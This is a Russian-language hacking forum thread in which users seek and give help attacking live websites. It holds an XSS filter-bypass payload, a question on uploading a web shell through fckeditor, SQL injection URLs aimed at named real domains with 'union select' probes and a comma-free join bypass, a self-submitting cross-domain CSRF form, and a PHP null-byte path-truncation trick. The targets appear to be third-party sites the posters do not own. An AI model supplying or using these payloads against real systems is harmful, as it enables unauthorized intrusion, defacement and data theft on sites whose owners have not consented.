Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Kolyan333

    Kolyan333 New Member

    Joined:
    2 May 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Вопрос насчет XSS. Фильтр пускает все, но есть защита , все что между скобок удаляет, и если поставить пробел через скобку тоже пускает, но как вывести алерт не понял. p.s не получилось. пож помогите. сайт скину в ЛС
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    <svg/onload=setTimeout`alert\x28document.domain\x29`>
     
    _________________________
  3. Kolyan333

    Kolyan333 New Member

    Joined:
    2 May 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    не получилось (
     
  4. PulsarEX547

    PulsarEX547 New Member

    Joined:
    18 Jan 2016
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Ты видел что я написал? там нету директорий в которые можно хоть что то написать, и возможности записи - нет. Тут либо снипеты остаются, либо док менеджер...
     
  5. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    Привет, вообщем нашел fckeditor. как через него залить шелл? может кто сталкивался?

    [​IMG]
     
    #1045 RWD, 23 Jan 2016
    Last edited: 23 Jan 2016
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
  7. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    Привет. Помогите раскрутить SQL:
    Code:
    https://www.sbxchanger.com/feedback.php?p=ok&page=/
     
  8. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    не крутиться вроде бы
     
  9. sergei_petrovish

    sergei_petrovish New Member

    Joined:
    24 Jan 2016
    Messages:
    31
    Likes Received:
    3
    Reputations:
    1
    Здраствуйте, не могу отправить пост форму ajax c сообщением. Проверка на CSRF , сообщение без перезагрузки страницы
    Никаких скрытых параметров не передается, может есть какая то особенность в этих форм ?
    Код формы
    HTML:
    <form action="сайт/ajax/curency" method="post">
    <textarea maxlength="2048" rows="5" required="required" class="form-control" name="msg_body"></textarea>
    <br>
    <button class="btn btn-success" type="button" onclick="send_message_for_user(this); return false;">
    Отправить сообщение </button>
    <input name="xxx" value="yy" type="hidden">
    <input name="xxx" value="yy" type="hidden">
    </form>
    </div>
    Мой код формы автоматической отправки с другого домена

    HTML:
    <form method="post" action="сайт/ajax/curency"
    
    
    <input name="msg_body" value=" сообщение" type="text">
    
    <input name="xxx" value="yyy" type="hidden">
    <input name="xxx" value"yyy" type="hidden">
    
    </form>
    <script>document.getElementsByTagName('form')[0].submit();</script>
     
  10. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Фильтрация на запятые.

    Code:
    http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+
    
    http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+
    Используйте конструкции join
     
    _________________________
  12. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Чёт не фига не получается
     
  13. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    А что вы попробовали?

    Покажите запрос.
     
    _________________________
  14. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Ты не понял, я не очень шарю в языке php и sql
     
    ArmusIAm likes this.
  15. ArmusIAm

    ArmusIAm New Member

    Joined:
    8 Jan 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Если не сложно, расскажи более подробно. Очень интересно но сути не уловил.

    В принципе, запрос итак проходит (к тому же на первом запросе, запятые по прежнему остаются в запросе?):
    Code:
    http://www.bbctop.cc/index.php?act=respons.respons&cid=27+order+by+10--
    Проблема начинается в http://www.bbctop.cc/index.php?act=respons.respons&cid=-27+union+select+1,2,3,4,5,6,7,8,9,10--
    Можешь показать на этом примере? Спасибо!;)
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Потому что запятые. Я это написал ранее. Используйте конструкции без запятых.

    (select+1)a join (select+2)b join (select+3)c

    Топик называется "Помощь по уязвимостям", а не "Сделай всё за нас".
    Мы помогаем, вы анализируете в чём косяк и пытаетесь решить, прикладывая свои решения.
    А мы уже исправляем их и направляем в нужное русло.

    Стратегия понятна?
     
    _________________________
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    _________________________
  18. ArmusIAm

    ArmusIAm New Member

    Joined:
    8 Jan 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Полностью согласен.

    Дело в том, что ты так написал как будто выше - пример, отсюда недопонимание. А так Гугл вообще мой братец);)
     
  19. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    Какая альтернатива null byte в php 5.3.3? Вроде сам null byte пофиксили в 5.3.4
     
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Вроде бы /////[4096]/////
     
    _________________________
    Filipp likes this.